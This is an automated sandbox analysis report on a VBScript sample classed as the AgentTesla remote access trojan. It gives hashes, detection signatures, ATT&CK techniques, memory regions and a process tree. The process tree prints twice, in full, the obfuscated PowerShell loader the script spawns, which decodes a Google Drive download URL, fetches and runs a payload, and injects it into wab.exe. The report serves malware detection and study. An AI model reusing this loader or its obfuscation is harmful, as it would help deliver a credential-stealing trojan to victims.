Analysis

  • max time kernel
    145s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-03-2024 02:55

General

  • Target

    e74c7eeb8441dcc8faf37169cd15805f10b6a21c9982d8395728f5978622f982.vbs

  • Size

    37KB

  • MD5

    97c163bbb028e2bb1439bbe5e9497cfe

  • SHA1

    a69c484d867309e1d36f88f0edcca3cb155e25b8

  • SHA256

    e74c7eeb8441dcc8faf37169cd15805f10b6a21c9982d8395728f5978622f982

  • SHA512

    64e1444c4862392660ff697805b3817fcb7f5db21cb6a1cb56ed4b4e4e8e10ae067cb6c8b79dbec5a4affeb6d5b618aed0fdd87b92f489be23890236d9e6ff7e

  • SSDEEP

    384:u09gBJmUIWz0AujGKoCJmMuttrW6ku83V3aiHwMgz0YaXBP2a+eGHz4b467QiBAc:u09gBJEWAZGc8NnKwiQxwZY36cuA+yBC

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e74c7eeb8441dcc8faf37169cd15805f10b6a21c9982d8395728f5978622f982.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Iracundulous Operationsplans Unvisually dripstick #>;$Augustes=(cmd /c set /A 115^^0);Function Unperspirable ([String]$Fartbde){$Mapau=[char][int]$Augustes+'ubstring';$Musicality=8;$Sengelinnedet=Deductibles($Fartbde);For($Miminypiminy=7; $Miminypiminy -lt $Sengelinnedet; $Miminypiminy+=$Musicality){$Fdeegnenes=$Fartbde.$Mapau.Invoke($Miminypiminy, 1);$Lacrimatory64=$Lacrimatory64+$Fdeegnenes;}$Lacrimatory64;}function Inkhornizer ($contenders){. ($Scribbet) ($contenders);}function Deductibles ([String]$henvisningsstreg){$Utvetydighedernes=$henvisningsstreg.Length-1;$Utvetydighedernes;}$Cirsith=Unperspirable 'Eist.ddT Disembr bu,sitaMatchsan SinknisIsoheltfNonre ieSt iberrKompletr ElendiiLyksa.inRendemagHelsece ';$Attraktioner=Unperspirable 'TvangsfhAirdroptLun,ecot mulgep Mel tas Rastsm:chekken/Nahu,tl/ rapsfrdS.rigler AmazoniNse cravEctoblaeTwiggin.Hove stgUnfrockoSan stooprocentgPicktrelMed.tudeEpistle..ohnnyccIndhentoDeeaftamAttribu/ Ant.rauTeo oficSequens?Skrabtee fu orexTilgivep PriedioRecomp rD istebtKniplen=BeskyttdH.rvardoStableswTrlggennrei.corlWoodnoto H flevaGeschftdAircraf& Tulipoi Sn tykdAbso,bi=Efflr s1Bemande7Tanginen MagistW The mo7 TerresmDemonst1DemokrawSkraapu4KtterneV EmulsiHOptaltexStateliRGv nkle0 Morska3 CongoufAlcofor9Be mmes9KursivemPaatnktfParensa6Fods,or0Sk,dgar6MedalliG asmine5shiismb2A.ndeagrH,delseTPrvetek2U.nouriE mockerPtrontalACamcordY Brid,m ';$Scribbet=Unperspirable 'WeltedbiTerapieeBlaabrsx Boucha ';$Graaligt=Unperspirable 'Fngslin$ Fotogrg ManagelOverflaoBroomrab CodeteaUnde.aflWi,nabl: ractleBPakningrMyxo.laaFondsdisundereni utonoelAnnexbriLgehuseaAukje in svedkiePostclirBlasert2,psvulm2 ,ragef0 Tertir Sko dpu=Ski,tet FireworSTridenttGraupela RubellrS,lvhjutBrains,-P,etetsBKlunk siOverpe.tDvledessgteskabTCallistrSungcouaDurskaln UndlivsBlindebfUnt.nsieKrltopprUnwedsl .rythr-M.ssayiS Didymio MonotruRig ererCiderencGigabyteMicrurg Metamor$Doer.boASkrammet SpejlitprimtalrEquin aaPhotorekGru pestCloisteiKam luloTilsmagnIsochroeGo.inesrCabuyab Vealero-rengr.nDErklrineHarpnins Stockht ,urraciSpinatfnYnkso saEtiopietHjemfreiStarosto ercutinobligat A,olesc$StregniLNegropheVarmeduvSpildeveOmdiskurFac,piemAlternaaUnd,rtenUnpa ed ';Inkhornizer (Unperspirable 'Tylop.d$U veracgRechartlVitaminoamtsavibradiodyaOmtaag lLisping:OreodonLEs adree Likv dvza ersseAchedtrrMaggedrmBambisuaStormomnkarting=Soma.ro$Xerophie MensennDiakonivSerpent:Besky taStartp.pkolo.ispvolplandEntrepoaParat yt marrama ootfo ') ;Inkhornizer (Unperspirable ' KaktusINonc.ntmNogheadpSixth yoRaftervr Viti.utSer.efr-loharjoMSten.igoSeedfuldRedevisuEgnstealBrattineFolketi EmpirekB,wirlyai Spat etOsseouss BalancT educearMiswandaLitteranReintersUpstre fAnnb iteUdh linrTrosart ') ;$Leverman=$Leverman+'\Aktualiserende.Brn' ;Inkhornizer (Unperspirable 'Ukasega$ brormag .orurelCircasso Unkni bf.askega GnotoblRepro u: MatrosuDepressn Gastertsamlebarreserveiskydel,bVandr,luAquilegtPhyllopaEnvoyeerUnfoundyFrapper=Mun,res(Pr.contTShawledeAbsencesStudentt Bant m-MegalogP fi.briaRepagantColumneh Hjemme Bet.lin$UnderviL forsteethybornvMassivees emninrUrethromPalmegradioxinunSek aar).ndersl ') ;while (-not $untributary) {Inkhornizer (Unperspirable 'banderoI EmerysfKovendi real,ze(Brl,ren$Eucry tBRackangryork.hiaNonr ctsH.rtigkiFeltnuml RufleniDeleligaDnningenObbeniteDecametrMicrome2Tullenh2 Dobb l0Neph,ot.DelikatJReconsioGenanveb AntiflS Unl.pjt teromaabarbaritHomoo seAngled. indecor-Pois rseHavarisq Ectozo Rnkers$VkkelseCOpsoni iScorninrTalmudiselectroiCo,voketPirrelihattribu)Aabning Fre lan{AabenthSwic tant SikkeraD.tunesrPota,oetGen.ang-UdskejeSMout,fulC,toniceCollapseFennernpEmbleme Peramel1Jumblyt}S klubse tilb,glUdgiversTusindeeAfgrund{BulteriSbias.ngtTropemoaVejpl.drNonexcut Stikke-indkredSFordelilElementeFarverieReferripSpringe Skibuks1 s,umfi; IllustIPacificnDefoamekFrighteh ropforoAtaxyekr Skotjsn Bij uti o erexzSubtarseSkilletrBetegne aturfr$DepersoGSletbagrUnvocalaStadsaraServ celGambadeiDrum yngN,negostNi kysi} Fawner ');Inkhornizer (Unperspirable 'Afvan,r$TendancgG.flendl tatueroProbatibnideshaaPaaa,telFljtek,:W ckalcuKumeniknReg aratAfskrivrMerkantiSekt.rib.rnlednuTurbidltheadshia.arantirObsidiayGametop= T,gole(graatonTRespotse LetchysNonty.at Icef,l-KomplemPHandleaahex,dectTikampehIndexle Elsdyre$ GgehviLZoochoreDeruralv Spl nieNe dmperFreeloamAfskendaOplevernCardiga)Pulpiti ') ;}Inkhornizer (Unperspirable '.immeri$Kofilnagsta,usolGlassitoRadiablbSkambytamrkeligl Em.ral: Udste T D.gitaeAntsiesi ,poistsUnhymenm Str,dsePro ellnbranchi Phi.ant= Me,aph ormaliGFrstestePrehungtQabbala-ViceamtCLym,hyrob aanernInsertetAortopteFarveb,nNabogrutOp,rkso finansi$,uditorL Unhy,eeUngulpgvSituatieBielectralbatiom ,neakeaUnbash,n Indtrr ');Inkhornizer (Unperspirable 'Zincode$ Tuf sdgDirigenlUd.kudsoAftrykkb Debut,a SuffralTuborgs:AftersoB BensaiePolliworUnfi.icaSelvbedtMarenteiPupillon ImpervgFortryl Liniede= Idrift Utugtsf[SteningSNokke,ay UncompsTorobe,tFlegm tePri,termTictock. ImmateCSlangkooJudasesnLynchnivDialakteAmalg mr.edensktI.capsu] Martyr:Rigsaeb:D,preciFTabuingrPrototyoPhenelzmRemobilBSchantzaTow,shas.ismindeMisconn6Viceins4 Colle,S.daptattSvederer MusteeiPad,inonHedernegNormere(Slgerpa$DorosceTS hiwale.lektroiPostwars Dunst.mBearnaieGara.tinforhand)Lbesode ');Inkhornizer (Unperspirable 'Blokstr$indan ng Dechifl Aftagno finansbUmbellaaLaconiclOpspari:Konspi.SjequirinLefle,er formasePa ketgbEstami,aDe.yafsaMimrendnMisfatedgashouseMikrodat GaloppsAccel r Scribbl=Drummon Citrin [PraktikSF.nesnyyM,nnesks.hatnottMarioneeCoordinmNonunci. Tagme TBackfire PrecloxNigherrtAarsskr.NoncorrEAllissmnHeidlsvcGennemsoGolfs,rdProaviaiG,ntlemnSprhj lg Anted,] N.kked:Helbred:MisgoveASaxofonSDefinitCDem,kraITllerneIRigelig.U ykkesGHje,mepe GipsertTru selSTikantetGranulerMenigheiTodosaan Erikn g Habitu(Vinding$Trres.aBVandkmme DrikkerPlsebaraBnne netCloseabiDidascanSv,gescgCasual.)Bereds ');Inkhornizer (Unperspirable 'Primsig$ExcystagSouff,alThailanoStikordbArbejdsaRokkestlout ulk: ChaussP PlaquerAlludi.oCongo,ejFootweaeBran,vscPosturit umshyoc.rnhusr F rvelsSprogsa=Meanlys$UndergiSCloamennHusar,er fricaneSkrumleb Billiga ranklaskjultenOmredigdOoph.reelicencet Flkke,sdetract.TaxinglsKavalkauSelvbesbFlyvrtis FremkotKortuldrPro otyiDigteren Unfor.gJu enal( Imitat3Fo,ecab4Favoure3Udstill0Gippeds4Unpathe9Fugti.h,Dissimi3Progr s2 Kl,dre5Mispenn2F,ynseg1Tidsbeg)Foreyea ');Inkhornizer $Projectors;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3840
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Iracundulous Operationsplans Unvisually dripstick #>;$Augustes=(cmd /c set /A 115^^0);Function Unperspirable ([String]$Fartbde){$Mapau=[char][int]$Augustes+'ubstring';$Musicality=8;$Sengelinnedet=Deductibles($Fartbde);For($Miminypiminy=7; $Miminypiminy -lt $Sengelinnedet; $Miminypiminy+=$Musicality){$Fdeegnenes=$Fartbde.$Mapau.Invoke($Miminypiminy, 1);$Lacrimatory64=$Lacrimatory64+$Fdeegnenes;}$Lacrimatory64;}function Inkhornizer ($contenders){. ($Scribbet) ($contenders);}function Deductibles ([String]$henvisningsstreg){$Utvetydighedernes=$henvisningsstreg.Length-1;$Utvetydighedernes;}$Cirsith=Unperspirable 'Eist.ddT Disembr bu,sitaMatchsan SinknisIsoheltfNonre ieSt iberrKompletr ElendiiLyksa.inRendemagHelsece ';$Attraktioner=Unperspirable 'TvangsfhAirdroptLun,ecot mulgep Mel tas Rastsm:chekken/Nahu,tl/ rapsfrdS.rigler AmazoniNse cravEctoblaeTwiggin.Hove stgUnfrockoSan stooprocentgPicktrelMed.tudeEpistle..ohnnyccIndhentoDeeaftamAttribu/ Ant.rauTeo oficSequens?Skrabtee fu orexTilgivep PriedioRecomp rD istebtKniplen=BeskyttdH.rvardoStableswTrlggennrei.corlWoodnoto H flevaGeschftdAircraf& Tulipoi Sn tykdAbso,bi=Efflr s1Bemande7Tanginen MagistW The mo7 TerresmDemonst1DemokrawSkraapu4KtterneV EmulsiHOptaltexStateliRGv nkle0 Morska3 CongoufAlcofor9Be mmes9KursivemPaatnktfParensa6Fods,or0Sk,dgar6MedalliG asmine5shiismb2A.ndeagrH,delseTPrvetek2U.nouriE mockerPtrontalACamcordY Brid,m ';$Scribbet=Unperspirable 'WeltedbiTerapieeBlaabrsx Boucha ';$Graaligt=Unperspirable 'Fngslin$ Fotogrg ManagelOverflaoBroomrab CodeteaUnde.aflWi,nabl: ractleBPakningrMyxo.laaFondsdisundereni utonoelAnnexbriLgehuseaAukje in svedkiePostclirBlasert2,psvulm2 ,ragef0 Tertir Sko dpu=Ski,tet FireworSTridenttGraupela RubellrS,lvhjutBrains,-P,etetsBKlunk siOverpe.tDvledessgteskabTCallistrSungcouaDurskaln UndlivsBlindebfUnt.nsieKrltopprUnwedsl .rythr-M.ssayiS Didymio MonotruRig ererCiderencGigabyteMicrurg Metamor$Doer.boASkrammet SpejlitprimtalrEquin aaPhotorekGru pestCloisteiKam luloTilsmagnIsochroeGo.inesrCabuyab Vealero-rengr.nDErklrineHarpnins Stockht ,urraciSpinatfnYnkso saEtiopietHjemfreiStarosto ercutinobligat A,olesc$StregniLNegropheVarmeduvSpildeveOmdiskurFac,piemAlternaaUnd,rtenUnpa ed ';Inkhornizer (Unperspirable 'Tylop.d$U veracgRechartlVitaminoamtsavibradiodyaOmtaag lLisping:OreodonLEs adree Likv dvza ersseAchedtrrMaggedrmBambisuaStormomnkarting=Soma.ro$Xerophie MensennDiakonivSerpent:Besky taStartp.pkolo.ispvolplandEntrepoaParat yt marrama ootfo ') ;Inkhornizer (Unperspirable ' KaktusINonc.ntmNogheadpSixth yoRaftervr Viti.utSer.efr-loharjoMSten.igoSeedfuldRedevisuEgnstealBrattineFolketi EmpirekB,wirlyai Spat etOsseouss BalancT educearMiswandaLitteranReintersUpstre fAnnb iteUdh linrTrosart ') ;$Leverman=$Leverman+'\Aktualiserende.Brn' ;Inkhornizer (Unperspirable 'Ukasega$ brormag .orurelCircasso Unkni bf.askega GnotoblRepro u: MatrosuDepressn Gastertsamlebarreserveiskydel,bVandr,luAquilegtPhyllopaEnvoyeerUnfoundyFrapper=Mun,res(Pr.contTShawledeAbsencesStudentt Bant m-MegalogP fi.briaRepagantColumneh Hjemme Bet.lin$UnderviL forsteethybornvMassivees emninrUrethromPalmegradioxinunSek aar).ndersl ') ;while (-not $untributary) {Inkhornizer (Unperspirable 'banderoI EmerysfKovendi real,ze(Brl,ren$Eucry tBRackangryork.hiaNonr ctsH.rtigkiFeltnuml RufleniDeleligaDnningenObbeniteDecametrMicrome2Tullenh2 Dobb l0Neph,ot.DelikatJReconsioGenanveb AntiflS Unl.pjt teromaabarbaritHomoo seAngled. indecor-Pois rseHavarisq Ectozo Rnkers$VkkelseCOpsoni iScorninrTalmudiselectroiCo,voketPirrelihattribu)Aabning Fre lan{AabenthSwic tant SikkeraD.tunesrPota,oetGen.ang-UdskejeSMout,fulC,toniceCollapseFennernpEmbleme Peramel1Jumblyt}S klubse tilb,glUdgiversTusindeeAfgrund{BulteriSbias.ngtTropemoaVejpl.drNonexcut Stikke-indkredSFordelilElementeFarverieReferripSpringe Skibuks1 s,umfi; IllustIPacificnDefoamekFrighteh ropforoAtaxyekr Skotjsn Bij uti o erexzSubtarseSkilletrBetegne aturfr$DepersoGSletbagrUnvocalaStadsaraServ celGambadeiDrum yngN,negostNi kysi} Fawner ');Inkhornizer (Unperspirable 'Afvan,r$TendancgG.flendl tatueroProbatibnideshaaPaaa,telFljtek,:W ckalcuKumeniknReg aratAfskrivrMerkantiSekt.rib.rnlednuTurbidltheadshia.arantirObsidiayGametop= T,gole(graatonTRespotse LetchysNonty.at Icef,l-KomplemPHandleaahex,dectTikampehIndexle Elsdyre$ GgehviLZoochoreDeruralv Spl nieNe dmperFreeloamAfskendaOplevernCardiga)Pulpiti ') ;}Inkhornizer (Unperspirable '.immeri$Kofilnagsta,usolGlassitoRadiablbSkambytamrkeligl Em.ral: Udste T D.gitaeAntsiesi ,poistsUnhymenm Str,dsePro ellnbranchi Phi.ant= Me,aph ormaliGFrstestePrehungtQabbala-ViceamtCLym,hyrob aanernInsertetAortopteFarveb,nNabogrutOp,rkso finansi$,uditorL Unhy,eeUngulpgvSituatieBielectralbatiom ,neakeaUnbash,n Indtrr ');Inkhornizer (Unperspirable 'Zincode$ Tuf sdgDirigenlUd.kudsoAftrykkb Debut,a SuffralTuborgs:AftersoB BensaiePolliworUnfi.icaSelvbedtMarenteiPupillon ImpervgFortryl Liniede= Idrift Utugtsf[SteningSNokke,ay UncompsTorobe,tFlegm tePri,termTictock. ImmateCSlangkooJudasesnLynchnivDialakteAmalg mr.edensktI.capsu] Martyr:Rigsaeb:D,preciFTabuingrPrototyoPhenelzmRemobilBSchantzaTow,shas.ismindeMisconn6Viceins4 Colle,S.daptattSvederer MusteeiPad,inonHedernegNormere(Slgerpa$DorosceTS hiwale.lektroiPostwars Dunst.mBearnaieGara.tinforhand)Lbesode ');Inkhornizer (Unperspirable 'Blokstr$indan ng Dechifl Aftagno finansbUmbellaaLaconiclOpspari:Konspi.SjequirinLefle,er formasePa ketgbEstami,aDe.yafsaMimrendnMisfatedgashouseMikrodat GaloppsAccel r Scribbl=Drummon Citrin [PraktikSF.nesnyyM,nnesks.hatnottMarioneeCoordinmNonunci. Tagme TBackfire PrecloxNigherrtAarsskr.NoncorrEAllissmnHeidlsvcGennemsoGolfs,rdProaviaiG,ntlemnSprhj lg Anted,] N.kked:Helbred:MisgoveASaxofonSDefinitCDem,kraITllerneIRigelig.U ykkesGHje,mepe GipsertTru selSTikantetGranulerMenigheiTodosaan Erikn g Habitu(Vinding$Trres.aBVandkmme DrikkerPlsebaraBnne netCloseabiDidascanSv,gescgCasual.)Bereds ');Inkhornizer (Unperspirable 'Primsig$ExcystagSouff,alThailanoStikordbArbejdsaRokkestlout ulk: ChaussP PlaquerAlludi.oCongo,ejFootweaeBran,vscPosturit umshyoc.rnhusr F rvelsSprogsa=Meanlys$UndergiSCloamennHusar,er fricaneSkrumleb Billiga ranklaskjultenOmredigdOoph.reelicencet Flkke,sdetract.TaxinglsKavalkauSelvbesbFlyvrtis FremkotKortuldrPro otyiDigteren Unfor.gJu enal( Imitat3Fo,ecab4Favoure3Udstill0Gippeds4Unpathe9Fugti.h,Dissimi3Progr s2 Kl,dre5Mispenn2F,ynseg1Tidsbeg)Foreyea ');Inkhornizer $Projectors;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:216
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:4468
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2816
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5976 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:1820

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Modify Registry

        1
        T1112

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Command and Control

        Web Service

        1
        T1102

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zu5yiimm.2tk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/216-47-0x0000000007370000-0x0000000007384000-memory.dmp
          Filesize

          80KB

        • memory/216-43-0x00000000070E0000-0x0000000007176000-memory.dmp
          Filesize

          600KB

        • memory/216-22-0x00000000024C0000-0x00000000024F6000-memory.dmp
          Filesize

          216KB

        • memory/216-23-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-50-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-57-0x0000000076FB1000-0x00000000770D1000-memory.dmp
          Filesize

          1.1MB

        • memory/216-56-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-55-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-54-0x00000000088A0000-0x000000000D81D000-memory.dmp
          Filesize

          79.5MB

        • memory/216-53-0x0000000007600000-0x0000000007601000-memory.dmp
          Filesize

          4KB

        • memory/216-51-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-24-0x0000000004F90000-0x00000000055B8000-memory.dmp
          Filesize

          6.2MB

        • memory/216-25-0x0000000004F60000-0x0000000004F82000-memory.dmp
          Filesize

          136KB

        • memory/216-26-0x0000000005640000-0x00000000056A6000-memory.dmp
          Filesize

          408KB

        • memory/216-27-0x0000000005720000-0x0000000005786000-memory.dmp
          Filesize

          408KB

        • memory/216-33-0x0000000005790000-0x0000000005AE4000-memory.dmp
          Filesize

          3.3MB

        • memory/216-38-0x0000000005CA0000-0x0000000005CBE000-memory.dmp
          Filesize

          120KB

        • memory/216-39-0x00000000063C0000-0x000000000640C000-memory.dmp
          Filesize

          304KB

        • memory/216-40-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-41-0x00000000076C0000-0x0000000007D3A000-memory.dmp
          Filesize

          6.5MB

        • memory/216-42-0x0000000006450000-0x000000000646A000-memory.dmp
          Filesize

          104KB

        • memory/216-75-0x0000000074590000-0x0000000074D40000-memory.dmp
          Filesize

          7.7MB

        • memory/216-44-0x0000000007080000-0x00000000070A2000-memory.dmp
          Filesize

          136KB

        • memory/216-45-0x00000000082F0000-0x0000000008894000-memory.dmp
          Filesize

          5.6MB

        • memory/216-48-0x0000000074590000-0x0000000074D40000-memory.dmp
          Filesize

          7.7MB

        • memory/216-20-0x0000000074590000-0x0000000074D40000-memory.dmp
          Filesize

          7.7MB

        • memory/216-46-0x00000000070B0000-0x00000000070D2000-memory.dmp
          Filesize

          136KB

        • memory/216-21-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/216-49-0x0000000000FB0000-0x0000000000FC0000-memory.dmp
          Filesize

          64KB

        • memory/892-15-0x0000019FD7260000-0x0000019FD7274000-memory.dmp
          Filesize

          80KB

        • memory/892-14-0x0000019FD7230000-0x0000019FD7256000-memory.dmp
          Filesize

          152KB

        • memory/892-13-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-12-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-11-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-10-0x00007FF97ABC0000-0x00007FF97B681000-memory.dmp
          Filesize

          10.8MB

        • memory/892-16-0x00007FF97ABC0000-0x00007FF97B681000-memory.dmp
          Filesize

          10.8MB

        • memory/892-17-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-18-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-19-0x0000019FD4BD0000-0x0000019FD4BE0000-memory.dmp
          Filesize

          64KB

        • memory/892-0-0x0000019FBC670000-0x0000019FBC692000-memory.dmp
          Filesize

          136KB

        • memory/892-80-0x00007FF97ABC0000-0x00007FF97B681000-memory.dmp
          Filesize

          10.8MB

        • memory/2816-87-0x0000000025310000-0x000000002531A000-memory.dmp
          Filesize

          40KB

        • memory/2816-72-0x0000000000C60000-0x0000000001EB4000-memory.dmp
          Filesize

          18.3MB

        • memory/2816-74-0x0000000076FB1000-0x00000000770D1000-memory.dmp
          Filesize

          1.1MB

        • memory/2816-79-0x0000000074590000-0x0000000074D40000-memory.dmp
          Filesize

          7.7MB

        • memory/2816-78-0x0000000000C60000-0x0000000000CD6000-memory.dmp
          Filesize

          472KB

        • memory/2816-59-0x0000000076FB1000-0x00000000770D1000-memory.dmp
          Filesize

          1.1MB

        • memory/2816-58-0x0000000077038000-0x0000000077039000-memory.dmp
          Filesize

          4KB

        • memory/2816-83-0x0000000025340000-0x00000000253D2000-memory.dmp
          Filesize

          584KB

        • memory/2816-86-0x00000000253E0000-0x0000000025430000-memory.dmp
          Filesize

          320KB

        • memory/2816-81-0x0000000024E90000-0x0000000024EA0000-memory.dmp
          Filesize

          64KB

        • memory/2816-90-0x0000000074590000-0x0000000074D40000-memory.dmp
          Filesize

          7.7MB

        • memory/2816-91-0x0000000024E90000-0x0000000024EA0000-memory.dmp
          Filesize

          64KB